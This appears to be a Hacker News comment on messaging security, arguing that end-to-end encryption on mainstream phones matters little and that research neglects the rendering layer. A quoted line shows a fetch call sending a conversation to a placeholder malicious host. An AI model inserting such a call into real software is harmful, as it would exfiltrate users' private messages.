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lmmlast Thursday at 1:15 AM0 repliesview on HN

> Sometimes it all feels pointless

Building anything that's meant to be properly secure - secure enough that you worry about the distinction between E2E encryption and client-server encryption - on top of iOS and Google Play Services is IMO pretty pointless yes. People who care about their security to that extent will put in the effort to use something other than an iPhone. (The way that Signal promoters call people who use cryptosystems they don't like LARPers is classic projection; there's no real threat model for which Signal actually makes sense, except maybe if you work for the US government).

> I also feel weird that the bulk of the discussion is on hypothetical validity of a security protocol usually focused on the maths, when all of that can be subverted with a fetch("https://malvevolentactor.com", {body: JSON.stringify(convo)}) at the rendering layer. Anyone have any thoughts on this?

There's definitely a streetlight effect where academic cryptography researchers focus on the mathematical algorithms. Nowadays the circle of what you can get funding to do security research on is a little wider (toy models of the end to end messaging protocol, essentially) but still not enough to encompass the full human-to-human part that actually matters.